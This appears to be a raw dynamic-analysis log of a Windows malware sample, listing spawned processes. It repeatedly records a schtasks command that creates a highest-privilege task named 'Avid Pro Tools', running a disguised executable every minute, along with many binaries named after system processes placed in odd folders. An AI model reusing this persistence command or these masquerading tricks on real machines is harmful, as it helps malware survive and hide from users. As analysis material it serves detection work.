SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\taskeng.exe

taskeng.exe {D124F85A-5B27-40EC-BBC6-8D99248552CE} S-1-5-21-2958949473-3205530200-1453100116-1000:WHMFPZKA\Admin:Interactive:[1]

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\winNet\lsm.exe

C:\winNet\lsm.exe

C:\winNet\lsm.exe.exe

"C:\winNet\lsm.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\winNet\spoolsv.exe

C:\winNet\spoolsv.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\All Users\Microsoft\eHome\wininit.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe"

C:\winNet\Bloxstrap.exe

C:\winNet\Bloxstrap.exe

C:\Windows\Offline Web Pages\Refcrt.exe

"C:\Windows\Offline Web Pages\Refcrt.exe"

C:\Windows\Offline Web Pages\Refcrt.exe.exe

"C:\Windows\Offline Web Pages\Refcrt.exe.exe"

C:\winNet\Bloxstrap.exe.exe

"C:\winNet\Bloxstrap.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\All Users\Microsoft\eHome\wininit.exe.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\winNet\Idle.exe

C:\winNet\Idle.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\Program Files\Windows Defender\es-ES\cmd.exe

"C:\Program Files\Windows Defender\es-ES\cmd.exe"

C:\Windows\Prefetch\ReadyBoot\explorer.exe

C:\Windows\Prefetch\ReadyBoot\explorer.exe

C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe

"C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\conhost.exe"

C:\winNet\lsm.exe

C:\winNet\lsm.exe

C:\winNet\lsm.exe.exe

"C:\winNet\lsm.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Admin\WmiPrvSE.exe

C:\Users\Admin\WmiPrvSE.exe

C:\winNet\lsass.exe

C:\winNet\lsass.exe

C:\winNet\lsass.exe.exe

"C:\winNet\lsass.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Default User\dllhost.exe

"C:\Users\Default User\dllhost.exe"

C:\Users\Admin\AppData\Local\csrss.exe

C:\Users\Admin\AppData\Local\csrss.exe

C:\DriversavessessionDlldhcp\dwm.exe

C:\DriversavessessionDlldhcp\dwm.exe

C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe

"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe"

C:\DriversavessessionDlldhcp\dwm.exe.exe

"C:\DriversavessessionDlldhcp\dwm.exe.exe"

C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe

"C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\winNet\spoolsv.exe

C:\winNet\spoolsv.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe

C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe

"C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe"

C:\DriversavessessionDlldhcp\Roblox.exe

C:\DriversavessessionDlldhcp\Roblox.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe

"C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe"

C:\Users\All Users\Microsoft\eHome\wininit.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe"

C:\winNet\lsm.exe

C:\winNet\lsm.exe

C:\winNet\Bloxstrap.exe

C:\winNet\Bloxstrap.exe

C:\Windows\Offline Web Pages\Refcrt.exe

"C:\Windows\Offline Web Pages\Refcrt.exe"

C:\winNet\lsm.exe.exe

"C:\winNet\lsm.exe.exe"

C:\Windows\Offline Web Pages\Refcrt.exe.exe

"C:\Windows\Offline Web Pages\Refcrt.exe.exe"

C:\Users\All Users\Microsoft\eHome\wininit.exe.exe

"C:\Users\All Users\Microsoft\eHome\wininit.exe.exe"

C:\winNet\Bloxstrap.exe.exe

"C:\winNet\Bloxstrap.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

C:\winNet\Idle.exe

C:\winNet\Idle.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Users\Public\Pictures\sddsfsdf.exe

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\system32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\winNet\wscript.exe

C:\winNet\wscript.exe

C:\winNet\wscript.exe.exe

"C:\winNet\wscript.exe.exe"

C:\Users\Admin\AppData\Local\csrss.exe

"C:\Users\Admin\AppData\Local\csrss.exe"

Network

Files
